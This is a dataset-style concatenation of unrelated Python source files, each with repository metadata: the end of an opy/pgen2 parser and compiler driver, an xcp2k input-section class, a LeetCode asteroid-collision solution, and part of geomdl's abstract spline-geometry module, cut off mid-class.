return head + tail + ".".join(map(str, sys.version_info)) + ".pickle"
def load_grammar(gt="Grammar.txt", gp=None,
save=True, force=False, logger=None):
"""Load the grammar (maybe from a pickle)."""
if logger is None:
logger = logging.getLogger()
gp = _generate_pickle_name(gt) if gp is None else gp
if force or not _newer(gp, gt):
logger.info("Generating grammar tables from %s", gt)
g = pgen.generate_grammar(gt)
if save:
logger.info("Writing grammar tables to %s", gp)
try:
# calls pickle.dump on self.__dict__ after making it deterministic
g.dump(gp)
except OSError as e:
logger.info("Writing failed: %s", e)
else:
g = grammar.Grammar()
g.load(gp) # pickle.load()
return g
_READ_SOURCE_AS_UNICODE = True
# Not sure why this doesn't work? It should be more like what the compiler
# module expected.
#_READ_SOURCE_AS_UNICODE = False
# Emulate the interface that Transformer expects from parsermodule.c.
class Pgen2PythonParser:
def __init__(self, driver, start_symbol):
self.driver = driver
self.start_symbol = start_symbol
def suite(self, text):
# Python 3
#f = io.StringIO(text)
f = cStringIO.StringIO(text)
tokens = tokenize.generate_tokens(f.readline)
tree = self.driver.parse_tokens(tokens, start_symbol=self.start_symbol)
return tree
def CountTupleTree(tu):
"""Count the nodes in a tuple parse tree."""
if isinstance(tu, tuple):
s = 0
for entry in tu:
s += CountTupleTree(entry)
return s
elif isinstance(tu, int):
return 1
elif isinstance(tu, str):
return 1
else:
raise AssertionError(tu)
class TupleTreePrinter:
def __init__(self, names):
self._names = names
def Print(self, tu, f=sys.stdout, indent=0):
ind = ' ' * indent
f.write(ind)
if isinstance(tu, tuple):
f.write(self._names[tu[0]])
f.write('\n')
for entry in tu[1:]:
self.Print(entry, f, indent=indent+1)
elif isinstance(tu, int):
f.write(str(tu))
f.write('\n')
elif isinstance(tu, str):
f.write(str(tu))
f.write('\n')
else:
raise AssertionError(tu)
def main(argv):
grammar_path = argv[1]
# NOTE: This is cached as a pickle
gr = load_grammar(grammar_path)
FILE_INPUT = gr.symbol2number['file_input']
symbols = Symbols(gr)
pytree.Init(symbols) # for type_repr() pretty printing
transformer.Init(symbols) # for _names and other dicts
# In Python 2 code, always use from __future__ import print_function.
try:
del gr.keywords["print"]
except KeyError:
pass
#do_glue = False
do_glue = True
if do_glue: # Make it a flag
# Emulating parser.st structures from parsermodule.c.
# They have a totuple() method, which outputs tuples like this.
def py2st(gr, raw_node):
type, value, context, children = raw_node
# See pytree.Leaf
if context:
_, (lineno, column) = context
else:
lineno = 0 # default in Leaf
column = 0
if children:
return (type,) + tuple(children)
else:
return (type, value, lineno, column)
convert = py2st
else:
convert = pytree.convert
dr = driver.Driver(gr, convert=convert)
action = argv[2]
if action == 'stdlib-parse':
# This is what the compiler/ package was written against.
import parser
py_path = argv[3]
with open(py_path) as f:
st = parser.suite(f.read())
tree = st.totuple()
n = transformer.CountTupleTree(tree)
log('COUNT %d', n)
printer = TupleTreePrinter(HostStdlibNames())
printer.Print(tree)
elif action == 'parse':
py_path = argv[3]
with open(py_path) as f:
tokens = tokenize.generate_tokens(f.readline)
tree = dr.parse_tokens(tokens, start_symbol=FILE_INPUT)
if isinstance(tree, tuple):
n = CountTupleTree(tree)
log('COUNT %d', n)
printer = TupleTreePrinter(transformer._names)
printer.Print(tree)
else:
tree.PrettyPrint(sys.stdout)
log('\tChildren: %d' % len(tree.children), file=sys.stderr)
elif action == 'old-compile':
py_path = argv[3]
out_path = argv[4]
if do_glue:
py_parser = Pgen2PythonParser(dr, FILE_INPUT)
printer = TupleTreePrinter(transformer._names)
tr = transformer.Pgen2Transformer(py_parser, printer)
else:
tr = transformer.Transformer()
# for Python 2.7 compatibility:
if _READ_SOURCE_AS_UNICODE:
f = codecs.open(py_path, encoding='utf-8')
else:
f = open(py_path)
contents = f.read()
co = pycodegen.compile(contents, py_path, 'exec', transformer=tr)
log("Code length: %d", len(co.co_code))
# Write the .pyc file
with open(out_path, 'wb') as out_f:
h = pycodegen.getPycHeader(py_path)
out_f.write(h)
marshal.dump(co, out_f)
elif action == 'compile':
# 'opy compile' is pgen2 + compiler2
# TODO: import compiler2
#raise NotImplementedError
py_path = argv[3]
out_path = argv[4]
if do_glue:
py_parser = Pgen2PythonParser(dr, FILE_INPUT)
printer = TupleTreePrinter(transformer._names)
tr = transformer.Pgen2Transformer(py_parser, printer)
else:
tr = transformer.Transformer()
with open(py_path) as f:
contents = f.read()
co = pycodegen.compile(contents, py_path, 'exec', transformer=tr)
log("Code length: %d", len(co.co_code))
# Write the .pyc file
with open(out_path, 'wb') as out_f:
h = pycodegen.getPycHeader(py_path)
out_f.write(h)
marshal.dump(co, out_f)
elif action == 'compile2':
in_path = argv[3]
out_path = argv[4]
from compiler2 import pycodegen as pycodegen2
from misc import stdlib_compile
stdlib_compile.compileAndWrite(in_path, out_path, pycodegen2.compile)
elif action == 'run':
# TODO: Add an option like -v in __main__
#level = logging.DEBUG if args.verbose else logging.WARNING
#logging.basicConfig(level=level)
#logging.basicConfig(level=logging.DEBUG)
# Compile and run, without writing pyc file
py_path = argv[3]
opy_argv = argv[3:]
if py_path.endswith('.py'):
py_parser = Pgen2PythonParser(dr, FILE_INPUT)
printer = TupleTreePrinter(transformer._names)
tr = transformer.Pgen2Transformer(py_parser, printer)
with open(py_path) as f:
contents = f.read()
co = pycodegen.compile(contents, py_path, 'exec', transformer=tr)
execfile.run_code_object(co, opy_argv)
elif py_path.endswith('.pyc') or py_path.endswith('.opyc'):
with open(py_path) as f:
f.seek(8) # past header. TODO: validate it!
co = marshal.load(f)
execfile.run_code_object(co, opy_argv)
else:
raise RuntimeError('Invalid path %r' % py_path)
else:
raise RuntimeError('Invalid action %r' % action)
# Examples of nodes Leaf(type, value):
# Leaf(1, 'def')
# Leaf(4, '\n')
# Leaf(8, ')')
# Oh are these just tokens?
# yes.
# Node(prefix, children)
if __name__ == '__main__':
try:
main(sys.argv)
except RuntimeError as e:
log('FATAL: %s', e)
sys.exit(1)
| [
"[email protected]"
] | |
28cd2ba0f453c1e05fbe64bea3586c73a9f79d23 | f3bd271bf00325881fb5b2533b9ef7f7448a75ec | /xcp2k/classes/_ic1.py | dfa06f08d6b858b4ef14780d7a8e80c0a989bcb7 | [] | no_license | obaica/xcp2k | 7f99fc9d494859e16b9b0ea8e217b0493f4b2f59 | 6e15c2c95658f545102595dc1783f5e03a9e6916 | refs/heads/master | 2020-07-15T17:27:43.378835 | 2019-02-11T16:32:24 | 2019-02-11T16:32:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | from xcp2k.inputsection import InputSection
class _ic1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Print_ic_list = None
self.Eps_dist = None
self.Optimize_homo_lumo = None
self.Gw_eigenvalues = None
self.Gw_eigenvalues_beta = None
self._name = "IC"
self._keywords = {'Optimize_homo_lumo': 'OPTIMIZE_HOMO_LUMO', 'Gw_eigenvalues': 'GW_EIGENVALUES', 'Eps_dist': 'EPS_DIST', 'Print_ic_list': 'PRINT_IC_LIST', 'Gw_eigenvalues_beta': 'GW_EIGENVALUES_BETA'}
self._aliases = {'Optimize': 'Optimize_homo_lumo'}
@property
def Optimize(self):
"""
See documentation for Optimize_homo_lumo
"""
return self.Optimize_homo_lumo
@Optimize.setter
def Optimize(self, value):
self.Optimize_homo_lumo = value
| [
"[email protected]"
] | |
5f7c905b69a5173153cc985d9e73093dceb5a83f | 5c531de5e4759c904e608b4fc653b2b041f79a0e | /Amazon_735. Asteroid Collision.py | 6737b4cae3d0689e2f94c48aac92eb951b2c6267 | [] | no_license | jianhui-ben/leetcode_python | 133c7e6e5c7316d00607ba2e327239e002de28b2 | fcc16124cc24a5993e27f5d97e78d8f290e68230 | refs/heads/master | 2022-06-05T22:32:18.034581 | 2022-05-17T02:27:11 | 2022-05-17T02:27:11 | 250,683,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,407 | py | #735. Asteroid Collision
#We are given an array asteroids of integers representing asteroids in a row.
#For each asteroid, the absolute value represents its size, and the sign represents
#its direction (positive meaning right, negative meaning left). Each asteroid moves
#at the same speed.
#Find out the state of the asteroids after all collisions. If two asteroids meet,
#the smaller one will explode. If both are the same size, both will explode. Two
#asteroids moving in the same direction will never meet.
#Example 1:
#Input: asteroids = [5,10,-5]
#Output: [5,10]
#Explanation: The 10 and -5 collide resulting in 10. The 5 and 10 never collide.
#Example 2:
#Input: asteroids = [8,-8]
#Output: []
#Explanation: The 8 and -8 collide exploding each other.
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
##better method:
out=[]
for star in asteroids:
while out and out[-1]>0 and star<0:
if abs(out[-1])>abs(star):
break
elif abs(out[-1])<abs(star):
out.pop()
elif abs(out[-1])==abs(star):
out.pop()
break
else:
out.append(star)
return out
# ##Ben's method
# positive=False
# temp=[]
# add_negative=True
# for i in range(len(asteroids)):
# if asteroids[i] < 0 and not positive:
# temp.append(asteroids[i])
# elif asteroids[i]>=0:
# positive=True
# temp.append(asteroids[i])
# elif asteroids[i]<0 and positive:
# while len(temp)>0 and temp[-1]>0:
# last_positive=temp.pop()
# if last_positive+ asteroids[i]>0:
# temp.append(last_positive)
# break
# elif last_positive+ asteroids[i]==0:
# add_negative=False
# break
# if (len(temp)==0 or temp[-1]<=0) and add_negative: temp.append(asteroids[i])
# add_negative=True
# if not temp: positive=False
# else: positive= temp[-1]>=0
# add_negative=True
# return temp
| [
"[email protected]"
] | |
4b6a65ee5967997a435363f289387f57cd5f8fef | 36dbd31536a4084db83d12b2bd12a9f22f4da636 | /geomdl/abstract.py | 614834b2701d5c774f0342a7c385090e5edb4f75 | [
"Python-2.0",
"MIT"
] | permissive | Hgser/NURBS-Python | 75d38a21721d9afd3d5f8491bf8ba56d71a2285a | ced4debdf4fc13afce9b830a2962da2789e5c45b | refs/heads/master | 2020-04-27T00:42:17.632484 | 2019-02-28T05:21:20 | 2019-02-28T05:21:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103,171 | py | """
.. module:: abstract
:platform: Unix, Windows
:synopsis: Provides abstract base classes for parametric shapes
.. moduleauthor:: Onur Rauf Bingol <[email protected]>
"""
import copy
import abc
import six
import warnings
from .evaluators import AbstractEvaluator
from .tessellate import AbstractTessellate
from . import vis
from . import helpers
from . import utilities
from . import voxelize
from .exceptions import GeomdlException
@six.add_metaclass(abc.ABCMeta)
class Geometry(object):
""" Abstract base class for defining geometry elements.
This class provides the following properties:
* :py:attr:`name`
* :py:attr:`evalpts`
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
"""
def __init__(self, **kwargs):
self._precision = int(kwargs.get('precision', 18)) # number of decimal places to round to
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
self._eval_points = self._init_array() # evaluated points
self._name = "Geometry object" # descriptor field
self._iter_index = 0 # iterator index
self._cache = {} # cache dictionary
def __iter__(self):
self._iter_index = 0
return self
def next(self):
return self.__next__()
def __next__(self):
if self._iter_index > 0:
raise StopIteration
self._iter_index += 1
return self
def __len__(self):
return 1
def __copy__(self):
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
def __deepcopy__(self, memo):
# Don't copy self reference
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Don't copy the cache
memo[id(self._cache)] = self._cache.__new__(dict)
# Copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
return result
def __str__(self):
return self.name
__repr__ = __str__
def _init_array(self):
""" Initializes the arrays. """
if callable(self._array_type):
return self._array_type()
return list()
@property
def name(self):
""" Descriptor field for storing the shape identification data, such as names, ID numbers, etc.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the descriptor
:setter: Sets the descriptor
:type: str
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def evalpts(self):
""" Evaluated points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the coordinates of the evaluated points
:type: list
"""
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
return self._eval_points
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Abstract method for the implementation of evaluation algorithm.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
pass
@six.add_metaclass(abc.ABCMeta)
class SplineGeometry(Geometry):
""" Abstract base class for defining spline geometries.
This class provides the following properties:
* :py:attr:`name`
* :py:attr:`rational`
* :py:attr:`dimension`
* :py:attr:`pdimension`
* :py:attr:`degree`
* :py:attr:`knotvector`
* :py:attr:`ctrlpts`
* :py:attr:`ctrlpts_size`
* :py:attr:`weights` (for completeness with the rational spline implementations)
* :py:attr:`evalpts`
* :py:attr:`bbox`
* :py:attr:`evaluator`
* :py:attr:`vis`
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
super(SplineGeometry, self).__init__(**kwargs)
self._pdim = 0 if not hasattr(self, '_pdim') else self._pdim # parametric dimension
self._dinit = 0.1 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._rational = False # defines whether the B-spline object is rational or not
self._dimension = 0 # spatial dimension
self._degree = [0 for _ in range(self._pdim)] # degree
self._knot_vector = [self._init_array() for _ in range(self._pdim)] # knot vector
self._control_points = self._init_array() # control points
self._control_points_size = [0 for _ in range(self._pdim)] # control points length
self._delta = [self._dinit for _ in range(self._pdim)] # evaluation delta
self._bounding_box = self._init_array() # bounding box
self._evaluator = None # evaluator instance
self._vis_component = None # visualization component
self._span_func = kwargs.get('find_span_func', helpers.find_span_linear) # default "find_span" function
self._kv_normalize = kwargs.get('normalize_kv', True) # flag to control knot vector normalization
@property
def rational(self):
""" Defines the rational and non-rational B-spline shapes.
Rational shapes use homogeneous coordinates which includes a weight alongside with the Cartesian coordinates.
Rational B-splines are also named as NURBS (Non-uniform rational basis spline) and non-rational B-splines are
sometimes named as NUBS (Non-uniform basis spline) or directly as B-splines.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Returns True is the B-spline object is rational (NURBS)
:type: bool
"""
return self._rational
@property
def dimension(self):
""" Spatial dimension.
Spatial dimension will be automatically estimated from the first element of the control points array.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the spatial dimension, e.g. 2D, 3D, etc.
:type: int
"""
if self._rational:
return self._dimension - 1
return self._dimension
@property
def pdimension(self):
""" Parametric dimension.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the parametric dimension
:type: int
"""
return self._pdim
@property
def degree(self):
""" Degree
:getter: Gets the degree
:setter: Sets the degree
:type: list
"""
return self._degree
@degree.setter
def degree(self, value):
self._degree = value
@property
def knotvector(self):
""" Knot vector
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector
@knotvector.setter
def knotvector(self, value):
self._knot_vector = value
@property
def ctrlpts(self):
""" Control points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
self._control_points = value
@property
def ctrlpts_size(self):
""" Total number of control points.
:getter: Gets the total number of control points
:type: int
"""
res = 1
for sz in self._control_points_size:
res *= sz
return res
@property
def weights(self):
""" Weights.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the weights
:setter: Sets the weights
"""
return None
@weights.setter
def weights(self, value):
pass
@property
def domain(self):
""" Domain.
Domain is determined using the knot vector(s).
:getter: Gets the domain
"""
retval = []
for idx, kv in enumerate(self._knot_vector):
retval.append((kv[self._degree[idx]], kv[-(self._degree[idx] + 1)]))
return retval[0] if self._pdim == 1 else retval
@property
def range(self):
""" Domain range.
:getter: Gets the range
"""
retval = []
for idx, kv in enumerate(self._knot_vector):
retval.append(kv[-(self._degree[idx]) + 1] - kv[self._degree[idx]])
return retval[0] if self._pdim == 1 else retval
@property
def bbox(self):
""" Bounding box.
Evaluates the bounding box and returns the minimum and maximum coordinates.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the bounding box
:type: tuple
"""
if self._bounding_box is None or len(self._bounding_box) == 0:
self._bounding_box = utilities.evaluate_bounding_box(self.ctrlpts)
return self._bounding_box
@property
def evaluator(self):
""" Evaluator instance.
Evaluators allow users to use different algorithms for B-Spline and NURBS evaluations. Please see the
documentation on ``Evaluator`` classes.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the current Evaluator instance
:setter: Sets the Evaluator instance
:type: evaluators.AbstractEvaluator
"""
return self._evaluator
@evaluator.setter
def evaluator(self, value):
if not isinstance(value, AbstractEvaluator):
raise TypeError("The evaluator must be an instance of AbstractEvaluator")
value._span_func = self._span_func
self._evaluator = value
@property
def vis(self):
""" Visualization component.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the visualization component
:setter: Sets the visualization component
:type: vis.VisAbstract
"""
return self._vis_component
@vis.setter
def vis(self, value):
if not isinstance(value, vis.VisAbstract):
warnings.warn("Visualization component is NOT an instance of VisAbstract class")
return
self._vis_component = value
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
Keyword Arguments:
* ``array_init``: initializes the control points array in the instance
* ``array_check_for``: defines the types for input validation
* ``callback``: defines the callback function for processing input points
* ``dimension``: defines the spatial dimension of the input points
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
:param args: number of control points corresponding to each parametric dimension
:type args: tuple
"""
def validate_and_clean(pts_in, check_for, dimension, pts_out, **kws):
for idx, cpt in enumerate(pts_in):
if not isinstance(cpt, check_for):
raise ValueError("Element number " + str(idx) + " is not a valid input")
if len(cpt) != dimension:
raise ValueError("The input must be " + str(self._dimension) + " dimensional list - " + str(cpt) +
" is not a valid control point")
# Convert to list of floats
pts_out[idx] = [float(coord) for coord in cpt]
return pts_out
# Argument validation
if len(args) == 0:
args = [len(ctrlpts)]
if len(args) != self._pdim:
raise ValueError("Number of arguments after ctrlpts must be " + str(self._pdim))
# Keyword arguments
array_init = kwargs.get('array_init', [[] for _ in range(len(ctrlpts))])
array_check_for = kwargs.get('array_check_for', (list, tuple))
callback_func = kwargs.get('callback', validate_and_clean)
self._dimension = kwargs.get('dimension', len(ctrlpts[0]))
# Pop existing keywords from kwargs dict
existing_kws = ['array_init', 'array_check_for', 'callback', 'dimension']
for ekw in existing_kws:
if ekw in kwargs:
kwargs.pop(ekw)
# Set control points and sizes
self._control_points = callback_func(ctrlpts, array_check_for, self._dimension, array_init, **kwargs)
self._control_points_size = [int(arg) for arg in args]
@abc.abstractmethod
def render(self, **kwargs):
""" Abstract method for spline rendering and visualization.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
pass
@six.add_metaclass(abc.ABCMeta)
class Curve(SplineGeometry):
""" Abstract base class for defining spline curves.
Curve ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to
differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using
``six`` to set metaclass allows users to use the abstract classes in a correct way.
The abstract base classes in this module are implemented using a feature called Python Properties. This feature
allows users to use some of the functions as if they are class fields. You can also consider properties as a
pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of
these properties.
The Curve ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func`` keyword
as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the FindSpan
function in the ``helpers`` module.
You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details.
Code segment below illustrates a possible implementation of Curve abstract base class:
.. code-block:: python
:linenos:
from geomdl import abstract
class MyCurveClass(abstract.Curve):
def __init__(self, **kwargs):
super(MyCurveClass, self).__init__(**kwargs)
# Add your constructor code here
def evaluate(self, **kwargs):
# Implement this function
pass
def evaluate_single(self, uv):
# Implement this function
pass
def evaluate_list(self, uv_list):
# Implement this function
pass
def derivatives(self, u, v, order, **kwargs):
# Implement this function
pass
The properties and functions defined in the abstract base class will be automatically available in the subclasses.
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
self._pdim = 1 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions
self._dinit = 0.01 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
super(Curve, self).__init__(**kwargs) # Call parent function
self._name = "Curve" # descriptor field
@property
def order(self):
""" Order.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the order
:setter: Sets the order
:type: int
"""
return self.degree + 1
@order.setter
def order(self, value):
self.degree = value - 1
@property
def degree(self):
""" Degree.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the degree
:setter: Sets the degree
:type: int
"""
return self._degree[0]
@degree.setter
def degree(self, value):
val = int(value)
if val < 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the curve points list
self.reset(evalpts=True)
# Set degree
self._degree[0] = val
@property
def knotvector(self):
""" Knot vector.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector[0]
@knotvector.setter
def knotvector(self, value):
if self.degree == 0 or self._control_points is None or len(self._control_points) == 0:
raise ValueError("Set degree and control points first")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree, value, len(self._control_points)):
raise ValueError("Input is not a valid knot vector")
# Clean up the curve points lists
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def ctrlpts(self):
""" Control points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
self.set_ctrlpts(value)
@property
def sample_size(self):
""" Sample size.
Sample size defines the number of evaluated points to generate. It also sets the ``delta`` property.
The following figure illustrates the working principles of sample size property:
.. math::
\\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}}
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size
:setter: Sets sample size
:type: int
"""
return int(1.0 / self.delta) + 1
@sample_size.setter
def sample_size(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if self.knotvector is None or len(self.knotvector) == 0 or self.degree == 0:
warnings.warn("Cannot determine the delta value. Please set knot vector and degree before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start = self.knotvector[self.degree]
stop = self.knotvector[-(self.degree+1)]
# Set delta value
self.delta = (stop - start) / float(value - 1)
@property
def delta(self):
""" Evaluation delta.
Evaluation delta corresponds to the *step size* while ``evaluate`` function iterates on the knot vector to
generate curve points. Decreasing step size results in generation of more curve points.
Therefore; smaller the delta value, smoother the curve.
The following figure illustrates the working principles of the delta property:
.. math::
\\left[{{u_{start}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right]
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the delta value
:setter: Sets the delta value
:type: float
"""
return self._delta[0]
@delta.setter
def delta(self, value):
# Delta value for surface evaluation should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Curve evaluation delta should be between 0.0 and 1.0")
# Clean up the curve points list
self.reset(evalpts=True)
# Set new delta value
self._delta[0] = float(value)
@property
def data(self):
""" Returns a dictionary containing all shape data.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
"""
return dict(
rational=self.rational,
dimension=self.dimension,
degree=self._degree,
knotvector=self._knot_vector,
size=[self.ctrlpts_size],
control_points=self._control_points
)
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
"""
# It is not necessary to input args for curves
if not args:
args = [len(ctrlpts)]
# Validate input
for arg, degree in zip(args, self._degree):
if degree <= 0:
raise ValueError("Set the degree first")
if arg < degree + 1:
raise ValueError("Number of control points should be at least degree + 1")
# Clean up the curve and control points lists
self.reset(ctrlpts=True, evalpts=True)
# Call parent function
super(Curve, self).set_ctrlpts(ctrlpts, **kwargs)
def render(self, **kwargs):
""" Renders the curve using the visualization component
The visualization component must be set using :py:attr:`~vis` property before calling this method.
Keyword Arguments:
* ``cpcolor``: sets the color of the control points polygon
* ``evalcolor``: sets the color of the curve
* ``bboxcolor``: sets the color of the bounding box
* ``filename``: saves the plot with the input name
* ``plot``: controls plot window visibility. *Default: True*
* ``animate``: activates animation (if supported). *Default: False*
* ``extras``: adds line plots to the figure. *Default: None*
``plot`` argument is useful when you would like to work on the command line without any window context.
If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables
plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the
configuration class.
``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts
in the format described below:
.. code-block:: python
:linenos:
[
dict( # line plot 1
points=[[1, 2, 3], [4, 5, 6]], # list of points
name="My line Plot 1", # name displayed on the legend
color="red", # color of the line plot
size=6.5 # size of the line plot
),
dict( # line plot 2
points=[[7, 8, 9], [10, 11, 12]], # list of points
name="My line Plot 2", # name displayed on the legend
color="navy", # color of the line plot
size=12.5 # size of the line plot
)
]
"""
if not self._vis_component:
warnings.warn("No visualization component has been set")
return
cpcolor = kwargs.get('cpcolor', 'blue')
evalcolor = kwargs.get('evalcolor', 'black')
bboxcolor = kwargs.get('bboxcolor', 'darkorange')
filename = kwargs.get('filename', None)
plot_visible = kwargs.get('plot', True)
extra_plots = kwargs.get('extras', None)
animate_plot = kwargs.get('animate', False)
# Check all parameters are set
self._check_variables()
# Check if the curve has been evaluated
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
# Clear the visualization component
self._vis_component.clear()
# Control points
self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Evaluated points
self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts')
# Bounding box
self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox')
# User-defined plots
if extra_plots is not None:
for ep in extra_plots:
self._vis_component.add(ptsarr=ep['points'], name=ep['name'],
color=(ep['color'], ep['size']), plot_type='extras')
# Data requested by the visualization module
if self._vis_component.mconf['others']:
vis_other = self._vis_component.mconf['others'].split(",")
for vo in vis_other:
vo_clean = vo.strip()
# Send center point of the parametric space to the visualization module
if vo_clean == "midpt":
midprm = (max(self.knotvector) + min(self.knotvector)) / 2.0
midpt = self.evaluate_single(midprm)
self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean)
# Display the figure
if animate_plot:
self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible)
else:
self._vis_component.render(fig_save_as=filename, display_plot=plot_visible)
def reset(self, **kwargs):
""" Resets control points and/or evaluated points.
Keyword Arguments:
* ``evalpts``: if True, then resets evaluated points
* ``ctrlpts`` if True, then resets control points
"""
reset_ctrlpts = kwargs.get('ctrlpts', False)
reset_evalpts = kwargs.get('evalpts', False)
if reset_ctrlpts:
self._control_points = self._init_array()
self._bounding_box = self._init_array()
if reset_evalpts:
self._eval_points = self._init_array()
# Checks whether the curve evaluation is possible or not
def _check_variables(self):
works = True
param_list = []
if self.degree == 0:
works = False
param_list.append('degree')
if self._control_points is None or len(self._control_points) == 0:
works = False
param_list.append('ctrlpts')
if self.knotvector is None or len(self.knotvector) == 0:
works = False
param_list.append('knotvector')
if not works:
raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list))
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Evaluates the curve.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
# Check all parameters are set before the curve evaluation
self._check_variables()
@abc.abstractmethod
def evaluate_single(self, param):
""" Evaluates the curve at the given parameter.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param: parameter (u)
"""
